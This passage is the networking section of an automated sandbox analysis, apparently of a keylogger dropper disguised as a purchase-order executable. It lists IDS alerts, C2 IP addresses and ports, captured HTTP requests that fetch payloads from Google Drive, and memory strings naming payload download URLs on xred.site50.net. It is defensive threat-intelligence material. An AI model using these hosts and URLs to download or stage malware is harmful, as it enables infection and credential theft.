                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData
                                Source: excel.exe Memory has grown: Private usage: 2MB later: 66MB

                                Networking

                                Source: Network traffic Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49739 -> 69.42.215.252:80
                                Source: Network traffic Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.4:49776 -> 172.111.138.100:5552
                                Source: Network traffic Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49776 -> 172.111.138.100:5552
                                Source: Network traffic Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49747 -> 172.111.138.100:5552
                                Source: Network traffic Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49801 -> 172.111.138.100:5552
                                Source: Network traffic Suricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.4:49801
                                Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49735 -> 142.250.181.14:443
                                Source: Malware configuration extractor URLs: xred.mooo.com
                                Source: unknown DNS query: name: freedns.afraid.org
                                Source: Joe Sandbox View IP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox View IP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox View ASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: unknown TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EF550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_00EF550C
                                Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
                                Source: global traffic HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
                                Source: global traffic HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70QdxmDNZdx5DTEQpOmYLPo2GV89s7sNwPnTgTVf8ltExH1fG_QvaP2ga3h3u15t3l9u_V-CsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-qUNXnhYN0uqETZQepr5kFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c; expires=Wed, 25-Jun-2025 17:20:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4PbudubIElEXUq7-_FvvXvnoqBmoqieu386bOYLsXcjg7N4cMne8PqeghudR8srQ5vCFZpfMEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VH_xAF7kxqJOwsiCF-cVTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU; expires=Wed, 25-Jun-2025 17:20:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmp, New PO - Supplier 0202AW-PER2.exe, ~$cache1.2.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978H
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar8
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000002.00000002.4128174320.000000000D3DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4131914637.000000000E41E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4145646856.000000000FD5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4114641588.000000000A1BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/derj
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/r
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/rj
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4092977786.0000000007CAE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4161314687.00000000178BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4160431770.0000000016EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4206204022.0000000022CBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4089808848.0000000006C6E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4088021839.0000000005D9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4151840183.000000001227E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4158484341.0000000015ABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4159029263.00000000160FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4157228035.0000000014CFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4195865068.000000001E5FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4198752452.000000001F9FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4155419429.0000000013DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4167668347.000000001A5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085752210.000000000565E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4171615042.000000001BC3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4151978119.00000000123BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4201279990.0000000020AFE000.00000004.00000010.00020000.00000000.sdmp, 
Synaptics.exe, 00000002.00000002.4210765812.00000000246FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4195449648.000000001E37E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#0
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#D
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#E
                                Source: Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$N
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%2
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%G
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%a
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%f
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%fG
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%k
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&1
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&F
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&R
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&_
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&eD
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(H
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(gB
                                Source: Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)9T
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)e
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)kC
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)w
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-1
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-F
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-i
